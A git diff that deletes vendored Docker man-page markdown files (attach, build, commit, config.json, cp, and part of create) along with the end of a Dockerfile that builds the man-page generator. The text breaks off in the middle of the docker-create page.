-RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/README.md b/vendor/github.com/docker/docker/man/README.md deleted file mode 100644 index 82dac650f9..0000000000 --- a/vendor/github.com/docker/docker/man/README.md +++ /dev/null @@ -1,15 +0,0 @@ -Docker Documentation -==================== - -This directory contains scripts for generating the man pages. Many of the man -pages are generated directly from the `spf13/cobra` `Command` definition. Some -legacy pages are still generated from the markdown files in this directory. -Do *not* edit the man pages in the man1 directory. Instead, update the -Cobra command or amend the Markdown files for legacy pages. - - -## Generate the man pages - -From within the project root directory run: - - make manpages diff --git a/vendor/github.com/docker/docker/man/docker-attach.1.md b/vendor/github.com/docker/docker/man/docker-attach.1.md deleted file mode 100644 index c39d1c9290..0000000000 --- a/vendor/github.com/docker/docker/man/docker-attach.1.md +++ /dev/null @@ -1,99 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-attach - Attach to a running container - -# SYNOPSIS -**docker attach** -[**--detach-keys**[=*[]*]] -[**--help**] -[**--no-stdin**] -[**--sig-proxy**[=*true*]] -CONTAINER - -# DESCRIPTION -The **docker attach** command allows you to attach to a running container using -the container's ID or name, either to view its ongoing output or to control it -interactively. You can attach to the same contained process multiple times -simultaneously, screen sharing style, or quickly view the progress of your -detached process. - -To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the -container. You can detach from the container (and leave it running) using a -configurable key sequence. The default sequence is `CTRL-p CTRL-q`. You -configure the key sequence using the **--detach-keys** option or a configuration -file. See **config-json(5)** for documentation on using a configuration file. - -It is forbidden to redirect the standard input of a `docker attach` command while -attaching to a tty-enabled container (i.e.: launched with `-t`). - -# OPTIONS -**--detach-keys**="" - Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. - -**--help** - Print usage statement - -**--no-stdin**=*true*|*false* - Do not attach STDIN. The default is *false*. - -**--sig-proxy**=*true*|*false* - Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied. The default is *true*. - -# Override the detach sequence - -If you want, you can configure an override the Docker key sequence for detach. -This is useful if the Docker default sequence conflicts with key sequence you -use for other applications. There are two ways to define your own detach key -sequence, as a per-container override or as a configuration property on your -entire configuration. - -To override the sequence for an individual container, use the -`--detach-keys=""` flag with the `docker attach` command. The format of -the `` is either a letter [a-Z], or the `ctrl-` combined with any of -the following: - -* `a-z` (a single lowercase alpha character ) -* `@` (at sign) -* `[` (left bracket) -* `\\` (two backward slashes) -* `_` (underscore) -* `^` (caret) - -These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key -sequences. To configure a different configuration default key sequence for all -containers, see **docker(1)**. - -# EXAMPLES - -## Attaching to a container - -In this example the top command is run inside a container, from an image called -fedora, in detached mode. The ID from the container is passed into the **docker -attach** command: - - # ID=$(sudo docker run -d fedora /usr/bin/top -b) - # sudo docker attach $ID - top - 02:05:52 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.1%us, 0.2%sy, 0.0%ni, 99.7%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355560k used, 18012k free, 27872k buffers - Swap: 786428k total, 0k used, 786428k free, 221740k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17200 1116 912 R 0 0.3 0:00.03 top - - top - 02:05:55 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.0%us, 0.2%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355244k used, 18328k free, 27872k buffers - Swap: 786428k total, 0k used, 786428k free, 221776k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-build.1.md b/vendor/github.com/docker/docker/man/docker-build.1.md deleted file mode 100644 index 4beee88e4a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-build.1.md +++ /dev/null @@ -1,340 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-build - Build an image from a Dockerfile - -# SYNOPSIS -**docker build** -[**--build-arg**[=*[]*]] -[**--cpu-shares**[=*0*]] -[**--cgroup-parent**[=*CGROUP-PARENT*]] -[**--help**] -[**-f**|**--file**[=*PATH/Dockerfile*]] -[**-squash**] *Experimental* -[**--force-rm**] -[**--isolation**[=*default*]] -[**--label**[=*[]*]] -[**--no-cache**] -[**--pull**] -[**--compress**] -[**-q**|**--quiet**] -[**--rm**[=*true*]] -[**-t**|**--tag**[=*[]*]] -[**-m**|**--memory**[=*MEMORY*]] -[**--memory-swap**[=*LIMIT*]] -[**--network**[=*"default"*]] -[**--shm-size**[=*SHM-SIZE*]] -[**--cpu-period**[=*0*]] -[**--cpu-quota**[=*0*]] -[**--cpuset-cpus**[=*CPUSET-CPUS*]] -[**--cpuset-mems**[=*CPUSET-MEMS*]] -[**--ulimit**[=*[]*]] -PATH | URL | - - -# DESCRIPTION -This will read the Dockerfile from the directory specified in **PATH**. -It also sends any other files and directories found in the current -directory to the Docker daemon. The contents of this directory would -be used by **ADD** commands found within the Dockerfile. - -Warning, this will send a lot of data to the Docker daemon depending -on the contents of the current directory. The build is run by the Docker -daemon, not by the CLI, so the whole context must be transferred to the daemon. -The Docker CLI reports "Sending build context to Docker daemon" when the context is sent to -the daemon. - -When the URL to a tarball archive or to a single Dockerfile is given, no context is sent from -the client to the Docker daemon. In this case, the Dockerfile at the root of the archive and -the rest of the archive will get used as the context of the build. When a Git repository is -set as the **URL**, the repository is cloned locally and then sent as the context. - -# OPTIONS -**-f**, **--file**=*PATH/Dockerfile* - Path to the Dockerfile to use. If the path is a relative path and you are - building from a local directory, then the path must be relative to that - directory. If you are building from a remote URL pointing to either a - tarball or a Git repository, then the path must be relative to the root of - the remote context. In all cases, the file must be within the build context. - The default is *Dockerfile*. - -**--squash**=*true*|*false* - **Experimental Only** - Once the image is built, squash the new layers into a new image with a single - new layer. Squashing does not destroy any existing image, rather it creates a new - image with the content of the squshed layers. This effectively makes it look - like all `Dockerfile` commands were created with a single layer. The build - cache is preserved with this method. - - **Note**: using this option means the new image will not be able to take - advantage of layer sharing with other images and may use significantly more - space. - - **Note**: using this option you may see significantly more space used due to - storing two copies of the image, one for the build cache with all the cache - layers in tact, and one for the squashed version. - -**--build-arg**=*variable* - name and value of a **buildarg**. - - For example, if you want to pass a value for `http_proxy`, use - `--build-arg=http_proxy="http://some.proxy.url"` - - Users pass these values at build-time. Docker uses the `buildargs` as the - environment context for command(s) run via the Dockerfile's `RUN` instruction - or for variable expansion in other Dockerfile instructions. This is not meant - for passing secret values. [Read more about the buildargs instruction](https://docs.docker.com/engine/reference/builder/#arg) - -**--force-rm**=*true*|*false* - Always remove intermediate containers, even after unsuccessful builds. The default is *false*. - -**--isolation**="*default*" - Isolation specifies the type of isolation technology used by containers. - -**--label**=*label* - Set metadata for an image - -**--no-cache**=*true*|*false* - Do not use cache when building the image. The default is *false*. - -**--help** - Print usage statement - -**--pull**=*true*|*false* - Always attempt to pull a newer version of the image. The default is *false*. - -**--compress**=*true*|*false* - Compress the build context using gzip. The default is *false*. - -**-q**, **--quiet**=*true*|*false* - Suppress the build output and print image ID on success. The default is *false*. - -**--rm**=*true*|*false* - Remove intermediate containers after a successful build. The default is *true*. - -**-t**, **--tag**="" - Repository names (and optionally with tags) to be applied to the resulting - image in case of success. Refer to **docker-tag(1)** for more information - about valid tag names. - -**-m**, **--memory**=*MEMORY* - Memory limit - -**--memory-swap**=*LIMIT* - A limit value equal to memory plus swap. Must be used with the **-m** -(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** -(**--memory**) value. - - The format of `LIMIT` is `[]`. Unit can be `b` (bytes), -`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a -unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. - -**--network**=*bridge* - Set the networking mode for the RUN instructions during build. Supported standard - values are: `bridge`, `host`, `none` and `container:`. Any other value - is taken as a custom network's name or ID which this container should connect to. - -**--shm-size**=*SHM-SIZE* - Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. - If you omit the size entirely, the system uses `64m`. - -**--cpu-shares**=*0* - CPU shares (relative weight). - - By default, all containers get the same proportion of CPU cycles. - CPU shares is a 'relative weight', relative to the default setting of 1024. - This default value is defined here: - ``` - cat /sys/fs/cgroup/cpu/cpu.shares - 1024 - ``` - You can change this proportion by adjusting the container's CPU share - weighting relative to the weighting of all other running containers. - - To modify the proportion from the default of 1024, use the **--cpu-shares** - flag to set the weighting to 2 or higher. - - Container CPU share Flag - {C0} 60% of CPU --cpu-shares=614 (614 is 60% of 1024) - {C1} 40% of CPU --cpu-shares=410 (410 is 40% of 1024) - - The proportion is only applied when CPU-intensive processes are running. - When tasks in one container are idle, the other containers can use the - left-over CPU time. The actual amount of CPU time used varies depending on - the number of containers running on the system. - - For example, consider three containers, where one has **--cpu-shares=1024** and - two others have **--cpu-shares=512**. When processes in all three - containers attempt to use 100% of CPU, the first container would receive - 50% of the total CPU time. If you add a fourth container with **--cpu-shares=1024**, - the first container only gets 33% of the CPU. The remaining containers - receive 16.5%, 16.5% and 33% of the CPU. - - - Container CPU share Flag CPU time - {C0} 100% --cpu-shares=1024 33% - {C1} 50% --cpu-shares=512 16.5% - {C2} 50% --cpu-shares=512 16.5% - {C4} 100% --cpu-shares=1024 33% - - - On a multi-core system, the shares of CPU time are distributed across the CPU - cores. Even if a container is limited to less than 100% of CPU time, it can - use 100% of each individual CPU core. - - For example, consider a system with more than three cores. If you start one - container **{C0}** with **--cpu-shares=512** running one process, and another container - **{C1}** with **--cpu-shares=1024** running two processes, this can result in the following - division of CPU shares: - - PID container CPU CPU share - 100 {C0} 0 100% of CPU0 - 101 {C1} 1 100% of CPU1 - 102 {C1} 2 100% of CPU2 - -**--cpu-period**=*0* - Limit the CPU CFS (Completely Fair Scheduler) period. - - Limit the container's CPU usage. This flag causes the kernel to restrict the - container's CPU usage to the period you specify. - -**--cpu-quota**=*0* - Limit the CPU CFS (Completely Fair Scheduler) quota. - - By default, containers run with the full CPU resource. This flag causes the -kernel to restrict the container's CPU usage to the quota you specify. - -**--cpuset-cpus**=*CPUSET-CPUS* - CPUs in which to allow execution (0-3, 0,1). - -**--cpuset-mems**=*CPUSET-MEMS* - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on - NUMA systems. - - For example, if you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` -to ensure the processes in your Docker container only use memory from the first -two memory nodes. - -**--cgroup-parent**=*CGROUP-PARENT* - Path to `cgroups` under which the container's `cgroup` are created. - - If the path is not absolute, the path is considered relative to the `cgroups` path of the init process. -Cgroups are created if they do not already exist. - -**--ulimit**=[] - Ulimit options - - For more information about `ulimit` see [Setting ulimits in a -container](https://docs.docker.com/engine/reference/commandline/run/#set-ulimits-in-container---ulimit) - -# EXAMPLES - -## Building an image using a Dockerfile located inside the current directory - -Docker images can be built using the build command and a Dockerfile: - - docker build . - -During the build process Docker creates intermediate images. In order to -keep them, you must explicitly set `--rm=false`. - - docker build --rm=false . - -A good practice is to make a sub-directory with a related name and create -the Dockerfile in that directory. For example, a directory called mongo may -contain a Dockerfile to create a Docker MongoDB image. Likewise, another -directory called httpd may be used to store Dockerfiles for Apache web -server images. - -It is also a good practice to add the files required for the image to the -sub-directory. These files will then be specified with the `COPY` or `ADD` -instructions in the `Dockerfile`. - -Note: If you include a tar file (a good practice), then Docker will -automatically extract the contents of the tar file specified within the `ADD` -instruction into the specified target. - -## Building an image and naming that image - -A good practice is to give a name to the image you are building. Note that -only a-z0-9-_. should be used for consistency. There are no hard rules here but it is best to give the names consideration. - -The **-t**/**--tag** flag is used to rename an image. Here are some examples: - -Though it is not a good practice, image names can be arbitrary: - - docker build -t myimage . - -A better approach is to provide a fully qualified and meaningful repository, -name, and tag (where the tag in this context means the qualifier after -the ":"). In this example we build a JBoss image for the Fedora repository -and give it the version 1.0: - - docker build -t fedora/jboss:1.0 . - -The next example is for the "whenry" user repository and uses Fedora and -JBoss and gives it the version 2.1 : - - docker build -t whenry/fedora-jboss:v2.1 . - -If you do not provide a version tag then Docker will assign `latest`: - - docker build -t whenry/fedora-jboss . - -When you list the images, the image above will have the tag `latest`. - -You can apply multiple tags to an image. For example, you can apply the `latest` -tag to a newly built image and add another tag that references a specific -version. -For example, to tag an image both as `whenry/fedora-jboss:latest` and -`whenry/fedora-jboss:v2.1`, use the following: - - docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 . - -So renaming an image is arbitrary but consideration should be given to -a useful convention that makes sense for consumers and should also take -into account Docker community conventions. - - -## Building an image using a URL - -This will clone the specified GitHub repository from the URL and use it -as context. The Dockerfile at the root of the repository is used as -Dockerfile. This only works if the GitHub repository is a dedicated -repository. - - docker build github.com/scollier/purpletest - -Note: You can set an arbitrary Git repository via the `git://` scheme. - -## Building an image using a URL to a tarball'ed context - -This will send the URL itself to the Docker daemon. The daemon will fetch the -tarball archive, decompress it and use its contents as the build context. The -Dockerfile at the root of the archive and the rest of the archive will get used -as the context of the build. If you pass an **-f PATH/Dockerfile** option as well, -the system will look for that file inside the contents of the tarball. - - docker build -f dev/Dockerfile https://10.10.10.1/docker/context.tar.gz - -Note: supported compression formats are 'xz', 'bzip2', 'gzip' and 'identity' (no compression). - -## Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Windows. The `--isolation=` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. On Microsoft Windows, you can specify these values: - -* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. -* `process`: Namespace isolation only. -* `hyperv`: Hyper-V hypervisor partition-based isolation. - -Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. - -# HISTORY -March 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-commit.1.md b/vendor/github.com/docker/docker/man/docker-commit.1.md deleted file mode 100644 index d8a4cf8387..0000000000 --- a/vendor/github.com/docker/docker/man/docker-commit.1.md +++ /dev/null @@ -1,71 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-commit - Create a new image from a container's changes - -# SYNOPSIS -**docker commit** -[**-a**|**--author**[=*AUTHOR*]] -[**-c**|**--change**[=\[*DOCKERFILE INSTRUCTIONS*\]]] -[**--help**] -[**-m**|**--message**[=*MESSAGE*]] -[**-p**|**--pause**[=*true*]] -CONTAINER [REPOSITORY[:TAG]] - -# DESCRIPTION -Create a new image from an existing container specified by name or -container ID. The new image will contain the contents of the -container filesystem, *excluding* any data volumes. Refer to **docker-tag(1)** -for more information about valid image and tag names. - -While the `docker commit` command is a convenient way of extending an -existing image, you should prefer the use of a Dockerfile and `docker -build` for generating images that you intend to share with other -people. - -# OPTIONS -**-a**, **--author**="" - Author (e.g., "John Hannibal Smith ") - -**-c** , **--change**=[] - Apply specified Dockerfile instructions while committing the image - Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` - -**--help** - Print usage statement - -**-m**, **--message**="" - Commit message - -**-p**, **--pause**=*true*|*false* - Pause container during commit. The default is *true*. - -# EXAMPLES - -## Creating a new image from an existing container -An existing Fedora based container has had Apache installed while running -in interactive mode with the bash shell. Apache is also running. To -create a new image run `docker ps` to find the container's ID and then run: - - # docker commit -m="Added Apache to Fedora base image" \ - -a="A D Ministrator" 98bd7fc99854 fedora/fedora_httpd:20 - -Note that only a-z0-9-_. are allowed when naming images from an -existing container. - -## Apply specified Dockerfile instructions while committing the image -If an existing container was created without the DEBUG environment -variable set to "true", you can create a new image based on that -container by first getting the container's ID with `docker ps` and -then running: - - # docker commit -c="ENV DEBUG true" 98bd7fc99854 debug-image - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and in -June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -Oct 2014, updated by Daniel, Dao Quang Minh -June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-config-json.5.md b/vendor/github.com/docker/docker/man/docker-config-json.5.md deleted file mode 100644 index 49987f08b8..0000000000 --- a/vendor/github.com/docker/docker/man/docker-config-json.5.md +++ /dev/null @@ -1,72 +0,0 @@ -% CONFIG.JSON(5) Docker User Manuals -% Docker Community -% JANUARY 2016 -# NAME -HOME/.docker/config.json - Default Docker configuration file - -# INTRODUCTION - -By default, the Docker command line stores its configuration files in a -directory called `.docker` within your `$HOME` directory. Docker manages most of -the files in the configuration directory and you should not modify them. -However, you *can modify* the `config.json` file to control certain aspects of -how the `docker` command behaves. - -Currently, you can modify the `docker` command behavior using environment -variables or command-line options. You can also use options within -`config.json` to modify some of the same behavior. When using these -mechanisms, you must keep in mind the order of precedence among them. Command -line options override environment variables and environment variables override -properties you specify in a `config.json` file. - -The `config.json` file stores a JSON encoding of several properties: - -* The `HttpHeaders` property specifies a set of headers to include in all messages -sent from the Docker client to the daemon. Docker does not try to interpret or -understand these header; it simply puts them into the messages. Docker does not -allow these headers to change any headers it sets for itself. - -* The `psFormat` property specifies the default format for `docker ps` output. -When the `--format` flag is not provided with the `docker ps` command, -Docker's client uses this property. If this property is not set, the client -falls back to the default table format. For a list of supported formatting -directives, see **docker-ps(1)**. - -* The `detachKeys` property specifies the default key sequence which -detaches the container. When the `--detach-keys` flag is not provide -with the `docker attach`, `docker exec`, `docker run` or `docker -start`, Docker's client uses this property. If this property is not -set, the client falls back to the default sequence `ctrl-p,ctrl-q`. - - -* The `imagesFormat` property specifies the default format for `docker images` -output. When the `--format` flag is not provided with the `docker images` -command, Docker's client uses this property. If this property is not set, the -client falls back to the default table format. For a list of supported -formatting directives, see **docker-images(1)**. - -You can specify a different location for the configuration files via the -`DOCKER_CONFIG` environment variable or the `--config` command line option. If -both are specified, then the `--config` option overrides the `DOCKER_CONFIG` -environment variable: - - docker --config ~/testconfigs/ ps - -This command instructs Docker to use the configuration files in the -`~/testconfigs/` directory when running the `ps` command. - -## Examples - -Following is a sample `config.json` file: - - { - "HttpHeaders": { - "MyHeader": "MyValue" - }, - "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}", - "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}", - "detachKeys": "ctrl-e,e" - } - -# HISTORY -January 2016, created by Moxiegirl diff --git a/vendor/github.com/docker/docker/man/docker-cp.1.md b/vendor/github.com/docker/docker/man/docker-cp.1.md deleted file mode 100644 index 949d60bb8b..0000000000 --- a/vendor/github.com/docker/docker/man/docker-cp.1.md +++ /dev/null @@ -1,175 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-cp - Copy files/folders between a container and the local filesystem. - -# SYNOPSIS -**docker cp** -[**--help**] -CONTAINER:SRC_PATH DEST_PATH|- - -**docker cp** -[**--help**] -SRC_PATH|- CONTAINER:DEST_PATH - -# DESCRIPTION - -The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`. -You can copy from the container's file system to the local machine or the -reverse, from the local filesystem to the container. If `-` is specified for -either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from -`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container. -The `SRC_PATH` or `DEST_PATH` can be a file or directory. - -The `docker cp` command assumes container paths are relative to the container's -`/` (root) directory. This means supplying the initial forward slash is optional; -The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and -`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can -be an absolute or relative value. The command interprets a local machine's -relative paths as relative to the current working directory where `docker cp` is -run. - -The `cp` command behaves like the Unix `cp -a` command in that directories are -copied recursively with permissions preserved if possible. Ownership is set to -the user and primary group at the destination. For example, files copied to a -container are created with `UID:GID` of the root user. Files copied to the local -machine are created with the `UID:GID` of the user which invoked the `docker cp` -command. If you specify the `-L` option, `docker cp` follows any symbolic link -in the `SRC_PATH`. `docker cp` does *not* create parent directories for -`DEST_PATH` if they do not exist. - -Assuming a path separator of `/`, a first argument of `SRC_PATH` and second -argument of `DEST_PATH`, the behavior is as follows: - -- `SRC_PATH` specifies a file - - `DEST_PATH` does not exist - - the file is saved to a file created at `DEST_PATH` - - `DEST_PATH` does not exist and ends with `/` - - Error condition: the destination directory must exist. - - `DEST_PATH` exists and is a file - - the destination is overwritten with the source file's contents - - `DEST_PATH` exists and is a directory - - the file is copied into this directory using the basename from - `SRC_PATH` -- `SRC_PATH` specifies a directory - - `DEST_PATH` does not exist - - `DEST_PATH` is created as a directory and the *contents* of the source - directory are copied into this directory - - `DEST_PATH` exists and is a file - - Error condition: cannot copy a directory to a file - - `DEST_PATH` exists and is a directory - - `SRC_PATH` does not end with `/.` - - the source directory is copied into this directory - - `SRC_PATH` does end with `/.` - - the *content* of the source directory is copied into this - directory - -The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above -rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not -the target, is copied by default. To copy the link target and not the link, -specify the `-L` option. - -A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can -also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local -machine, for example `file:name.txt`. If you use a `:` in a local machine path, -you must be explicit with a relative or absolute path, for example: - - `/path/to/file:name.txt` or `./file:name.txt` - -It is not possible to copy certain system files such as resources under -`/proc`, `/sys`, `/dev`, tmpfs, and mounts created by the user in the container. -However, you can still copy such files by manually running `tar` in `docker exec`. -For example (consider `SRC_PATH` and `DEST_PATH` are directories): - - $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH - - -or - - $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH - - - -Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive. -The command extracts the content of the tar to the `DEST_PATH` in container's -filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as -the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`. - -# OPTIONS -**-L**, **--follow-link**=*true*|*false* - Follow symbol link in SRC_PATH - -**--help** - Print usage statement - -# EXAMPLES - -Suppose a container has finished producing some output as a file it saves -to somewhere in its filesystem. This could be the output of a build job or -some other computation. You can copy these outputs from the container to a -location on your local host. - -If you want to copy the `/tmp/foo` directory from a container to the -existing `/tmp` directory on your host. If you run `docker cp` in your `~` -(home) directory on the local host: - - $ docker cp compassionate_darwin:tmp/foo /tmp - -Docker creates a `/tmp/foo` directory on your host. Alternatively, you can omit -the leading slash in the command. If you execute this command from your home -directory: - - $ docker cp compassionate_darwin:tmp/foo tmp - -If `~/tmp` does not exist, Docker will create it and copy the contents of -`/tmp/foo` from the container into this new directory. If `~/tmp` already -exists as a directory, then Docker will copy the contents of `/tmp/foo` from -the container into a directory at `~/tmp/foo`. - -When copying a single file to an existing `LOCALPATH`, the `docker cp` command -will either overwrite the contents of `LOCALPATH` if it is a file or place it -into `LOCALPATH` if it is a directory, overwriting an existing file of the same -name if one exists. For example, this command: - - $ docker cp sharp_ptolemy:/tmp/foo/myfile.txt /test - -If `/test` does not exist on the local machine, it will be created as a file -with the contents of `/tmp/foo/myfile.txt` from the container. If `/test` -exists as a file, it will be overwritten. Lastly, if `/test` exists as a -directory, the file will be copied to `/test/myfile.txt`. - -Next, suppose you want to copy a file or folder into a container. For example, -this could be a configuration file or some other input to a long running -computation that you would like to place into a created container before it -starts. This is useful because it does not require the configuration file or -other input to exist in the container image. - -If you have a file, `config.yml`, in the current directory on your local host -and wish to copy it to an existing directory at `/etc/my-app.d` in a container, -this command can be used: - - $ docker cp config.yml myappcontainer:/etc/my-app.d - -If you have several files in a local directory `/config` which you need to copy -to a directory `/etc/my-app.d` in a container: - - $ docker cp /config/. myappcontainer:/etc/my-app.d - -The above command will copy the contents of the local `/config` directory into -the directory `/etc/my-app.d` in the container. - -Finally, if you want to copy a symbolic link into a container, you typically -want to copy the linked target and not the link itself. To copy the target, use -the `-L` option, for example: - - $ ln -s /tmp/somefile /tmp/somefile.ln - $ docker cp -L /tmp/somefile.ln myappcontainer:/tmp/ - -This command copies content of the local `/tmp/somefile` into the file -`/tmp/somefile.ln` in the container. Without `-L` option, the `/tmp/somefile.ln` -preserves its symbolic link but not its content. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -May 2015, updated by Josh Hawn diff --git a/vendor/github.com/docker/docker/man/docker-create.1.md b/vendor/github.com/docker/docker/man/docker-create.1.md deleted file mode 100644 index 3f8a076374..0000000000 --- a/vendor/github.com/docker/docker/man/docker-create.1.md +++ /dev/null @@ -1,553 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-create - Create a new container - -# SYNOPSIS -**docker create** -[**-a**|**--attach**[=*[]*]] -[**--add-host**[=*[]*]] -[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] -[**--blkio-weight-device**[=*[]*]] -[**--cpu-shares**[=*0*]] -[**--cap-add**[=*[]*]] -[**--cap-drop**[=*[]*]] -[**--cgroup-parent**[=*CGROUP-PATH*]] -[**--cidfile**[=*CIDFILE*]] -[**--cpu-count**[=*0*]] -[**--cpu-percent**[=*0*]] -[**--cpu-period**[=*0*]] -[**--cpu-quota**[=*0*]] -[**--cpu-rt-period**[=*0*]] -[**--cpu-rt-runtime**[=*0*]] -[**--cpus**[=*0.0*]] -[**--cpuset-cpus**[=*CPUSET-CPUS*]] -[**--cpuset-mems**[=*CPUSET-MEMS*]] -[**--device**[=*[]*]] -[**--device-read-bps**[=*[]*]] -[**--device-read-iops**[=*[]*]] -[**--device-write-bps**[=*[]*]] -[**--device-write-iops**[=*[]*]] -[**--dns**[=*[]*]] -[**--dns-search**[=*[]*]] -[**--dns-option**[=*[]*]] -[**-e**|**--env**[=*[]*]] -[**--entrypoint**[=*ENTRYPOINT*]] -[**--env-file**[=*[]*]] -[**--expose**[=*[]*]] -[**--group-add**[=*[]*]] -[**-h**|**--hostname**[=*HOSTNAME*]] -[**--help**] -[**-i**|**--interactive**] -[**--ip**[=*IPv4-ADDRESS*]] -[**--ip6**[=*IPv6-ADDRESS*]] -[**--ipc**[=*IPC*]] -[**--isolation**[=*default*]] -[**--kernel-memory**[=*KERNEL-MEMORY*]] -[**-l**|**--label**[=*[]*]] -[**--label-file**[=*[]*]] -[**--link**[=*[]*]] -[**--link-local-ip**[=*[]*]] -[**--log-driver**[=*[]*]] -[**--log-opt**[=*[]*]] -[**-m**|**--memory**[=*MEMORY*]] -[**--mac-address**[=*MAC-ADDRESS*]] -[**--memory-reservation**[=*MEMORY-RESERVATION*]] -[**--memory-swap**[=*LIMIT*]] -[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]] -[**--name**[=*NAME*]] -[**--network-alias**[=*[]*]] -[**--network**[=*"bridge"*]] -[**--oom-kill-disable**] -[**--oom-score-adj**[=*0*]] -[**-P**|**--publish-all**] -[**-p**|**--publish**[=*[]*]] -[**--pid**[=*[PID]*]] -[**--userns**[=*[]*]] -[**--pids-limit**[=*PIDS_LIMIT*]] -[**--privileged**] -[**--read-only**] -[**--restart**[=*RESTART*]] -[**--rm**] -[**--security-opt**[=*[]*]] -[**--storage-opt**[=*[]*]] -[**--stop-signal**[=*SIGNAL*]] -[**--stop-timeout**[=*TIMEOUT*]] -[**--shm-size**[=*[]*]] -[**--sysctl**[=*[]*]] -[**-t**|**--tty**] -[**--tmpfs**[=*[CONTAINER-DIR[:]*]] -[**-u**|**--user**[=*USER*]] -[**--ulimit**[=*[]*]] -[**--uts**[=*[]*]] -[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]] -[**--volume-driver**[=*DRIVER*]] -[**--volumes-from**[=*[]*]] -[**-w**|**--workdir**[=*WORKDIR*]] -IMAGE [COMMAND] [ARG...] - -# DESCRIPTION - -Creates a writeable container layer over the specified image and prepares it for -running the specified command. The container ID is then printed to STDOUT. This -is similar to **docker run -d** except the container is never started. You can -then use the **docker start ** command to start the container at -any 